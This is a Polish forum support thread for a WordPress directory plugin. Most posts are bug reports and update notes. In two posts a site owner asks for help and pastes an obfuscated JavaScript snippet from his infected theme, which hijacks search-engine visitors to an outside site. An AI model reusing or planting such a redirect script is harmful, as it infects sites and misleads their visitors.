kursor Opublikowano 21 Kwietnia 2012 Autor Udostępnij Opublikowano 21 Kwietnia 2012 Sugeruję również wprowadzenie do płatności Paypal możliwości przypisania kodów. Paypal jest bezobsługowy i niech taki pozostanie. Jeżeli chcesz dawać kody promocyjne możesz zdefiniować np. odrębną grupę wpisów lub dopisywać kody do grupy, która jest obsługiwana kodami (SMS, transfery). Katalog stron na Wordpress Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
fix Opublikowano 21 Kwietnia 2012 Udostępnij Opublikowano 21 Kwietnia 2012 Mam problem: google zablokowało stronę z katalogiem - złośliwe oprogramowanie. W centrum webmastera znalazłem listing stron zainfekowanych - kategorie wp-cat, razem 33 strony, a jako niebezpieczny kod podają: <script language="JavaScript">eval(function(p,a,c,k,e,r){e=f unction©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,Str ing)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e ]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.re place(new RegExp('\\b'+e©+'\\b','g'),k[c]);return p}('e r= x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3 ("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g" ;4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r. 3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c "+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6) .o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s ubstring|split||||||ea|ht|tp|document|||go|window|location'. split('|'),0,{}))</script> To Twój kawałek kodu, czy ktoś się podpiął? Był już taki problem? Na wysoki cholesterol - aloes: aloeamer.pl Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
kursor Opublikowano 21 Kwietnia 2012 Autor Udostępnij Opublikowano 21 Kwietnia 2012 Mam problem: google zablokowało stronę z katalogiem - złośliwe oprogramowanie. W centrum webmastera znalazłem listing stron zainfekowanych - kategorie wp-cat, razem 33 strony, a jako niebezpieczny kod podają: <script language="JavaScript">eval(function(p,a,c,k,e,r){e=f unction{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,Str ing)){while(c--)r[e]=k[c]||e;k=[function(e){return r[e ]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.re place(new RegExp('\\b'+e+'\\b','g'),k[c]);return p}('e r= x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3 ("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g" ;4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r. 3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c "+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6) .o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s ubstring|split||||||ea|ht|tp|document|||go|window|location'. split('|'),0,{}))</script> To Twój kawałek kodu, czy ktoś się podpiął? Był już taki problem? 100% procent nie mój. Przydałby się lepszy token, ponieważ niedługo dodawarki zasypią katalog na wp-kat. Mam to w planach... Katalog stron na Wordpress Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
fix Opublikowano 21 Kwietnia 2012 Udostępnij Opublikowano 21 Kwietnia 2012 100% procent nie mój. znalazłem. w funkcjach templatki siedział, a przylepiał się w stopce do stron, które widział - a widział kategorie. pozdrawiam Na wysoki cholesterol - aloes: aloeamer.pl Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
S3ntin3l Opublikowano 23 Kwietnia 2012 Udostępnij Opublikowano 23 Kwietnia 2012 Zauważyłem ,że czasami walidacja wpisów źle zlicza ilość znaków w tekście. Przykładowo używając pogrubień, podkreśleń, czy wstawiając linki w treści, ilość znaków była liczona chyba razem z kodem html (przez co raz był limit do 1000 znaków, a mój tekst mając koło 900 nie przeszedł). Nie wiem czy tak ma być, czy też nie powinna walidacja usuwać html i wtedy sprawdzać sam tekst. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
kursor Opublikowano 23 Kwietnia 2012 Autor Udostępnij Opublikowano 23 Kwietnia 2012 Zauważyłem ,że czasami walidacja wpisów źle zlicza ilość znaków w tekście. Przykładowo używając pogrubień, podkreśleń, czy wstawiając linki w treści, ilość znaków była liczona chyba razem z kodem html (przez co raz był limit do 1000 znaków, a mój tekst mając koło 900 nie przeszedł). Nie wiem czy tak ma być, czy też nie powinna walidacja usuwać html i wtedy sprawdzać sam tekst. Mogą być różnice. W formularzu zlicza funkcja w JavaScript, a walidacja po stronie serwera jest w PHP. Mam w planie "synchronizację" tych funkcji, tak aby zliczały tak samo. To co jest w formularzu trzeba traktować jako wartość przybliżoną. Katalog stron na Wordpress Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
kursor Opublikowano 24 Kwietnia 2012 Autor Udostępnij Opublikowano 24 Kwietnia 2012 Jest kolejna aktualizacja - dodany widget "Statystyka Page Rank". Własne ikonki PR można wgrywać do wp-content/wp-kat/icons/pr Nazwy plików: 0.png, 1.png, ... 10.png Przykład: www.wp-kat.pl Katalog stron na Wordpress Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
S3ntin3l Opublikowano 25 Kwietnia 2012 Udostępnij Opublikowano 25 Kwietnia 2012 Zauważyłem, że podkategorie "sennik" i "senniki" są niepotrzebnie powielone. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
kursor Opublikowano 27 Kwietnia 2012 Autor Udostępnij Opublikowano 27 Kwietnia 2012 Zauważyłem, że podkategorie "sennik" i "senniki" są niepotrzebnie powielone. Dzięki za info. Następne wersje już nie będą tworzyć kategorii senniki. Katalog stron na Wordpress Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
kursor Opublikowano 28 Kwietnia 2012 Autor Udostępnij Opublikowano 28 Kwietnia 2012 Kolejna aktualizacja: obsługa BBCode. Zauważyłem, że pojawia się coraz więcej wpisów z BBCode (). W związku z tym dodałem ich obsługę w WP-kat. W nowych wpisach po przesłaniu formularza dodawania/edycji wpisu, BBCode zmieniane są na HTML. Jeżeli zdarzyło się, że istnieje jakiś wpis w katalogu, który ma BBCode również zostanie on zmieniony na HTML podczas wyświetlania. Katalog stron na Wordpress Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
peruniasty Opublikowano 29 Kwietnia 2012 Udostępnij Opublikowano 29 Kwietnia 2012 edit: temat na priv w sumie niepotrzebnie zaśmiecam Internetowa Baza Stron Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
kursor Opublikowano 29 Kwietnia 2012 Autor Udostępnij Opublikowano 29 Kwietnia 2012 Skonfigurowałem przed dodaniem wtyczki wp po swojemu (mam kilka blogów od kilku lat i śmigają). Po dodaniu wp-kat mam dziwne herezje i nie bardzo to ogarniam. Myślałem, że to wina skórki, ustawiłem templata standard wordpressa, czyli podstawowe darmówki jakie są i komedie dalej. Nawet w faq nie mogę wyczaić, co oznacza szablon wp-kat:default i 2 pozostałe. Co bym nie robił to zero efektu. Dodaj sugerowane kategorie - to są te 4 ? czyli agd, flora, rozrywka i komputery ? Resztę mam z palca dodawać ?Uprzejmie proszę o jakieś info - czy mam tylko poprzez wtyczkę konfigurować wp ? Wyłączyć oprócz podstawowych wtyczek: seo, xlm map, yarpp i innych wszystko z wp ? Bo jedno i drugie razem daje mi jakiś kaszan. ps. pomimo żadnych ustawień minimalnych wyświetleń stron, kategorii etc. mam w kółko kategorii wpisów wyświetlanych losowo 4 - co raz po F5 to inne Prześlij mi na PW adres instalacji i dane do zalogowania na admina. Razem ustalimy co jest nie tak... Katalog stron na Wordpress Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
kursor Opublikowano 5 Maja 2012 Autor Udostępnij Opublikowano 5 Maja 2012 Rozpoczynam testowanie dodawarki. Po pomyślnych testach dodawarka będzie dostępna jako standardowa funkcja WP-kat. Katalog stron na Wordpress Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
eljelj Opublikowano 5 Maja 2012 Udostępnij Opublikowano 5 Maja 2012 Przy okazji testowania dodawarki zauważyłem, że niektóre strony są podwójnie powprowadzane (z różnym textem). Nie wiem czy ten błąd walidacji adresów strony jest już poprawiony - więc zgłaszam. Prawdopodobnie chodzi tu o możliwość wprowadzenia 1 adresu na dwa sposoby - zakończony ukośnikiem i bez Katalog firm , który pomoże Tobie kupić i sprzedać co tylko chcesz. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
kursor Opublikowano 5 Maja 2012 Autor Udostępnij Opublikowano 5 Maja 2012 Przy okazji testowania dodawarki zauważyłem, że niektóre strony są podwójnie powprowadzane (z różnym textem). Nie wiem czy ten błąd walidacji adresów strony jest już poprawiony - więc zgłaszam. Prawdopodobnie chodzi tu o możliwość wprowadzenia 1 adresu na dwa sposoby - zakończony ukośnikiem i bez To już nie powinno się zdarzać. Prześlij mi na PW adresy takich wpisów. Katalog stron na Wordpress Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi
Zarchiwizowany
Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.